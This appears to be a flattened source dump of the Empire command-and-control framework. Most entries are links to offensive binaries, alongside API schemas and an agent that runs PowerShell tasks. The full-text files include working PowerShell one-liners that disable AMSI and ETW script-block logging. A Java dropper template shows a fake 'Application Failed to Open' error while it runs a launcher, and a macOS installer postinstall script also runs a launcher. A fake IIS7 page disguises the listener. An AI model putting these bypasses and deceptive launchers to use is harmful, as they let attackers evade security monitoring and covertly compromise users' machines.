 3 | from pydantic import BaseModel, ConfigDict
 4 | 
 5 | 
 6 | class Profile(BaseModel):
 7 |     id: int
 8 |     name: str
 9 |     file_path: str | None = None
10 |     category: str
11 |     data: str
12 |     created_at: datetime
13 |     updated_at: datetime
14 |     model_config = ConfigDict(from_attributes=True)
15 | 
16 | 
17 | class Profiles(BaseModel):
18 |     records: list[Profile]
19 | 
20 | 
21 | # name can't be modified atm because of the way name is inferred from the file name.
22 | # could be fixed later on.
23 | class ProfileUpdateRequest(BaseModel):
24 |     data: str
25 | 
26 | 
27 | class ProfilePostRequest(BaseModel):
28 |     name: str
29 |     category: str
30 |     data: str
31 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/shared_dependencies.py:
--------------------------------------------------------------------------------
 1 | from typing import Annotated
 2 | 
 3 | from fastapi import Depends
 4 | from sqlalchemy.orm import Session
 5 | 
 6 | from empire.server.common.empire import MainMenu
 7 | from empire.server.core.db.base import SessionLocal
 8 | 
 9 | 
10 | def get_db():
11 |     with SessionLocal.begin() as db:
12 |         yield db
13 | 
14 | 
15 | def get_main() -> MainMenu:
16 |     from empire.server.server import main
17 | 
18 |     return main
19 | 
20 | 
21 | CurrentSession = Annotated[Session, Depends(get_db)]
22 | AppCtx = Annotated[MainMenu, Depends(get_main)]
23 | 


--------------------------------------------------------------------------------
/empire/server/api/v2/stager/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/stager/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/tag/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/tag/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/user/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/user/__init__.py


--------------------------------------------------------------------------------
/empire/server/api/v2/websocket/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/api/v2/websocket/__init__.py


--------------------------------------------------------------------------------
/empire/server/bypasses/ETWBypass.yaml:
--------------------------------------------------------------------------------
 1 | name: etw
 2 | authors:
 3 |   - name: Satoshi Tanda
 4 |     handle: '@standa_t'
 5 |     link: https://twitter.com/standa_t
 6 | description: |
 7 |   This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
 8 |   which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
 9 |   to bypass Suspicious ScriptBlock Logging for readability.
10 | comments:
11 |   - https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32
12 | language: powershell
13 | min_language_version: '3'
14 | script: |
15 |   [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);
16 | 


--------------------------------------------------------------------------------
/empire/server/bypasses/MattifestationBypass.yaml:
--------------------------------------------------------------------------------
 1 | name: mattifestation
 2 | authors:
 3 |   - name: Matt Graeber
 4 |     handle: '@mattifestation'
 5 |     link: https://twitter.com/mattifestation
 6 | description: |
 7 |   Reflectively disables AMSI for the current PowerShell session.
 8 |   Note: This does not disable AMSI in the CLR
 9 | comments:
10 |   - Published via tweet that has since been taken down
11 | language: powershell
12 | min_language_version: '3'
13 | script: |
14 |   $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');
15 |   $Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);
16 | 


--------------------------------------------------------------------------------
/empire/server/common/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/common/__init__.py


--------------------------------------------------------------------------------
/empire/server/common/malleable/__init__.py:
--------------------------------------------------------------------------------
1 | from __future__ import absolute_import
2 | 
3 | from .implementation import Get, Post, Stager
4 | from .profile import Profile
5 | from .transaction import MalleableRequest, MalleableResponse, Transaction
6 | from .transformation import Container, Terminator, Transform
7 | from .utility import MalleableError, MalleableObject, MalleableUtil
8 | 


--------------------------------------------------------------------------------
/empire/server/core/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/core/__init__.py


--------------------------------------------------------------------------------
/empire/server/core/db/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/core/db/__init__.py


--------------------------------------------------------------------------------
/empire/server/core/exceptions.py:
--------------------------------------------------------------------------------
 1 | class PluginValidationException(Exception):
 2 |     pass
 3 | 
 4 | 
 5 | class PluginExecutionException(Exception):
 6 |     pass
 7 | 
 8 | 
 9 | class PluginLoadException(Exception):
10 |     pass
11 | 
12 | 
13 | class ModuleValidationException(Exception):
14 |     pass
15 | 
16 | 
17 | class ModuleExecutionException(Exception):
18 |     pass
19 | 


--------------------------------------------------------------------------------
/empire/server/core/host_process_service.py:
--------------------------------------------------------------------------------
 1 | import typing
 2 | 
 3 | from sqlalchemy import and_
 4 | from sqlalchemy.orm import Session
 5 | 
 6 | from empire.server.core.db import models
 7 | 
 8 | if typing.TYPE_CHECKING:
 9 |     from empire.server.common.empire import MainMenu
10 | 
11 | 
12 | class HostProcessService:
13 |     def __init__(self, main_menu: "MainMenu"):
14 |         self.main_menu = main_menu
15 | 
16 |     @staticmethod
17 |     def get_processes_for_host(db: Session, db_host: models.Host):
18 |         return (
19 |             db.query(models.HostProcess)
20 |             .filter(models.HostProcess.host_id == db_host.id)
21 |             .all()
22 |         )
23 | 
24 |     @staticmethod
25 |     def get_process_for_host(db: Session, db_host: models.Host, uid: int):
26 |         return (
27 |             db.query(models.HostProcess)
28 |             .filter(
29 |                 and_(
30 |                     models.HostProcess.process_id == uid,
31 |                     models.HostProcess.host_id == db_host.id,
32 |                 )
33 |             )
34 |             .first()
35 |         )
36 | 


--------------------------------------------------------------------------------
/empire/server/core/host_service.py:
--------------------------------------------------------------------------------
 1 | import typing
 2 | 
 3 | from sqlalchemy.orm import Session
 4 | 
 5 | from empire.server.core.db import models
 6 | 
 7 | if typing.TYPE_CHECKING:
 8 |     from empire.server.common.empire import MainMenu
 9 | 
10 | 
11 | class HostService:
12 |     def __init__(self, main_menu: "MainMenu"):
13 |         self.main_menu = main_menu
14 | 
15 |     @staticmethod
16 |     def get_all(db: Session):
17 |         return db.query(models.Host).all()
18 | 
19 |     @staticmethod
20 |     def get_by_id(db: Session, uid: int):
21 |         return db.query(models.Host).filter(models.Host.id == uid).first()
22 | 


--------------------------------------------------------------------------------
/empire/server/data/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/__init__.py


--------------------------------------------------------------------------------
/empire/server/data/agent/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/agent/__init__.py


--------------------------------------------------------------------------------
/empire/server/data/agent/gopire/README.md:
--------------------------------------------------------------------------------
1 | # Gopire
2 | 


--------------------------------------------------------------------------------
/empire/server/data/agent/gopire/go.mod:
--------------------------------------------------------------------------------
 1 | module EmpirGo
 2 | 
 3 | go 1.22
 4 | 
 5 | require (
 6 | 	github.com/Ne0nd0g/go-clr v1.0.3
 7 | 	github.com/gonutz/w32/v2 v2.11.1
 8 | 	github.com/praetorian-inc/goffloader v0.0.0-20240916162044-43d46b0da23d
 9 | 	golang.org/x/sys v0.22.0
10 | )
11 | 
12 | require (
13 | 	github.com/RIscRIpt/pecoff v0.0.0-20200923152459-a332238caa87 // indirect
14 | 	golang.org/x/text v0.3.7 // indirect
15 | )
16 | 


--------------------------------------------------------------------------------
/empire/server/data/agent/gopire/tasks/powershell_task.go:
--------------------------------------------------------------------------------
 1 | package tasks
 2 | 
 3 | import (
 4 | 	"bytes"
 5 | 	"fmt"
 6 | 	"os/exec"
 7 | )
 8 | 
 9 | func RunPowerShellScript(script string) string {
10 | 	// Prepare the PowerShell command
11 | 	cmd := exec.Command("powershell", "-NoProfile", "-NonInteractive", "-Command", script)
12 | 
13 | 	// Capture the output
14 | 	var out bytes.Buffer
15 | 	var stderr bytes.Buffer
16 | 	cmd.Stdout = &out
17 | 	cmd.Stderr = &stderr
18 | 
19 | 	// Execute the command
20 | 	err := cmd.Run()
21 | 	if err != nil {
22 | 		return fmt.Sprintf("Error: %v, Output: %s", err, stderr.String())
23 | 	}
24 | 
25 | 	return out.String()
26 | }
27 | 


--------------------------------------------------------------------------------
/empire/server/data/agent/stagers/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/agent/stagers/__init__.py


--------------------------------------------------------------------------------
/empire/server/data/agent/stagers/http/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/agent/stagers/http/__init__.py


--------------------------------------------------------------------------------
/empire/server/data/agent/stagers/smb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/agent/stagers/smb/__init__.py


--------------------------------------------------------------------------------
/empire/server/data/listeners/templates/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 2 | <html xmlns="http://www.w3.org/1999/xhtml">
 3 | <head>
 4 |     <meta content="text/html; charset=iso-8859-1" http-equiv="Content-Type"/>
 5 |     <title>IIS7</title>
 6 |     <style type="text/css">
 7 | <!--
 8 | body {
 9 | 	color:#000000;
10 | 	background-color:#B3B3B3;
11 | 	margin:0;
12 | }
13 | 
14 | #container {
15 | 	margin-left:auto;
16 | 	margin-right:auto;
17 | 	text-align:center;
18 | 	}
19 | 
20 | a img {
21 | 	border:none;
22 | }
23 | 
24 | -->
25 |     </style>
26 | </head>
27 | <body>
28 | <div id="container">
29 |     <a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img alt="IIS7" height="411"
30 |                                                                                 src="welcome.png"
31 |                                                                                 width="571"/></a>
32 | </div>
33 | </body>
34 | </html>
35 | 


--------------------------------------------------------------------------------
/empire/server/data/misc/ReflectivePick_x64_orig.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/ReflectivePick_x64_orig.dll


--------------------------------------------------------------------------------
/empire/server/data/misc/ReflectivePick_x86_orig.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/ReflectivePick_x86_orig.dll


--------------------------------------------------------------------------------
/empire/server/data/misc/Run.java:
--------------------------------------------------------------------------------
 1 | package com.installer.apple;
 2 | 
 3 | import java.io.*;
 4 | import javax.swing.JOptionPane;
 5 | 
 6 | public class Run{
 7 |     public static void main(String[] args){
 8 | 
 9 |         String[] cmd = {
10 |             "/bin/bash",
11 |             "-c",
12 |             "LAUNCHER"
13 |         };
14 | 
15 |         try {
16 |             Process p = Runtime.getRuntime().exec(cmd);
17 |             JOptionPane.showMessageDialog(null, "Application Failed to Open", "Error", JOptionPane.INFORMATION_MESSAGE);
18 |         }
19 |         catch (IOException e){}
20 |     }
21 | }
22 | 


--------------------------------------------------------------------------------
/empire/server/data/misc/apptemplateResources/empty/macho:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/apptemplateResources/empty/macho


--------------------------------------------------------------------------------
/empire/server/data/misc/apptemplateResources/icon/stormtrooper.icns:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/apptemplateResources/icon/stormtrooper.icns


--------------------------------------------------------------------------------
/empire/server/data/misc/apptemplateResources/x64/launcher.app/Contents/MacOS/launcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/apptemplateResources/x64/launcher.app/Contents/MacOS/launcher


--------------------------------------------------------------------------------
/empire/server/data/misc/apptemplateResources/x64/launcher.app/Contents/PkgInfo:
--------------------------------------------------------------------------------
1 | APPL????
2 | 


--------------------------------------------------------------------------------
/empire/server/data/misc/apptemplateResources/x64/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/apptemplateResources/x64/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib


--------------------------------------------------------------------------------
/empire/server/data/misc/apptemplateResources/x86/launcher.app/Contents/MacOS/launcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/apptemplateResources/x86/launcher.app/Contents/MacOS/launcher


--------------------------------------------------------------------------------
/empire/server/data/misc/apptemplateResources/x86/launcher.app/Contents/PkgInfo:
--------------------------------------------------------------------------------
1 | APPL????
2 | 


--------------------------------------------------------------------------------
/empire/server/data/misc/apptemplateResources/x86/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/apptemplateResources/x86/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib


--------------------------------------------------------------------------------
/empire/server/data/misc/hijackers/template.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/hijackers/template.dylib


--------------------------------------------------------------------------------
/empire/server/data/misc/hijackers/template64.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/hijackers/template64.dylib


--------------------------------------------------------------------------------
/empire/server/data/misc/machotemplate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/machotemplate


--------------------------------------------------------------------------------
/empire/server/data/misc/pkgbuild/expand/PackageInfo:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8" standalone="no"?>
 2 | <pkg-info overwrite-permissions="true" relocatable="false" identifier="com.apple.APPNAME" postinstall-action="none" version="1.0" format-version="2" generator-version="InstallCmds-554 (15G31)" install-location="/" auth="root">
 3 |     <payload numberOfFiles="NUMOFFILES" installKBytes="PAYLOADSIZE"/>
 4 |     <bundle path="./APPNAME.app" id="com.apple.APPNAME" CFBundleShortVersionString="1.0" CFBundleVersion="1"/>
 5 |     <bundle-version>
 6 |         <bundle id="com.apple.APPNAME"/>
 7 |     </bundle-version>
 8 |     <upgrade-bundle>
 9 |         <bundle id="com.apple.APPNAME"/>
10 |     </upgrade-bundle>
11 |     <update-bundle/>
12 |     <atomic-update-bundle/>
13 |     <strict-identifier>
14 |         <bundle id="com.apple.APPNAME"/>
15 |     </strict-identifier>
16 |     <relocate>
17 |         <bundle id="com.apple.APPNAME"/>
18 |     </relocate>
19 |     <scripts>
20 |         <postinstall file="./postinstall"/>
21 |     </scripts>
22 | </pkg-info>
23 | 


--------------------------------------------------------------------------------
/empire/server/data/misc/pkgbuild/root/Applications/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/pkgbuild/root/Applications/test


--------------------------------------------------------------------------------
/empire/server/data/misc/pkgbuild/scripts/postinstall:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | LAUNCHER
4 | 
5 | exit 0
6 | 


--------------------------------------------------------------------------------
/empire/server/data/misc/python_modules/mss.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/python_modules/mss.zip


--------------------------------------------------------------------------------
/empire/server/data/misc/templateLauncher.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/templateLauncher.dylib


--------------------------------------------------------------------------------
/empire/server/data/misc/templateLauncher64.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/templateLauncher64.dylib


--------------------------------------------------------------------------------
/empire/server/data/misc/welcome.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/welcome.png


--------------------------------------------------------------------------------
/empire/server/data/misc/x64_slim.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/x64_slim.dll


--------------------------------------------------------------------------------
/empire/server/data/misc/x86_slim.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/misc/x86_slim.dll


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/ClipboardWindow/ClipboardWindow-Inject.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/ClipboardWindow/ClipboardWindow-Inject.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/cobaltwhispers/SpawnProcess.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/cobaltwhispers/SpawnProcess.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/nanodump/nanodump.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/nanodump/nanodump.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/nanodump/nanodump.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/nanodump/nanodump.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/secinject/secinject.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/secinject/secinject.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/adcs_enum/adcs_enum.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/adcs_enum/adcs_enum.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/adcs_enum/adcs_enum.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/adcs_enum/adcs_enum.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/adcs_enum_com/adcs_enum_com.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/adcs_enum_com/adcs_enum_com.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/adcs_enum_com/adcs_enum_com.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/adcs_enum_com/adcs_enum_com.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/adcs_enum_com2/adcs_enum_com2.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/adcs_enum_com2/adcs_enum_com2.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/adcs_enum_com2/adcs_enum_com2.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/adcs_enum_com2/adcs_enum_com2.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/adv_audit_policies/adv_audit_policies.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/adv_audit_policies/adv_audit_policies.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/adv_audit_policies/adv_audit_policies.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/adv_audit_policies/adv_audit_policies.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/arp/arp.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/arp/arp.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/arp/arp.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/arp/arp.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/cacls/cacls.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/cacls/cacls.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/cacls/cacls.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/cacls/cacls.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/driversigs/driversigs.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/driversigs/driversigs.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/driversigs/driversigs.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/driversigs/driversigs.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/enum_filter_driver/enum_filter_driver.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/enum_filter_driver/enum_filter_driver.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/enum_filter_driver/enum_filter_driver.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/enum_filter_driver/enum_filter_driver.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/enumlocalsessions/enumlocalsessions.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/enumlocalsessions/enumlocalsessions.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/enumlocalsessions/enumlocalsessions.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/enumlocalsessions/enumlocalsessions.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/env/env.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/env/env.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/env/env.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/env/env.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/findLoadedModule/findLoadedModule.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/findLoadedModule/findLoadedModule.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/findLoadedModule/findLoadedModule.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/findLoadedModule/findLoadedModule.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/get-netsession/get-netsession.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/get-netsession/get-netsession.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/get-netsession/get-netsession.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/get-netsession/get-netsession.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/get_password_policy/get_password_policy.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/get_password_policy/get_password_policy.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/get_password_policy/get_password_policy.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/get_password_policy/get_password_policy.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/ipconfig/ipconfig.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/ipconfig/ipconfig.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/ipconfig/ipconfig.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/ipconfig/ipconfig.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/ldapsearch/ldapsearch.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/ldapsearch/ldapsearch.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/ldapsearch/ldapsearch.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/ldapsearch/ldapsearch.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/list_firewall_rules/list_firewall_rules.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/list_firewall_rules/list_firewall_rules.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/list_firewall_rules/list_firewall_rules.x86.o:
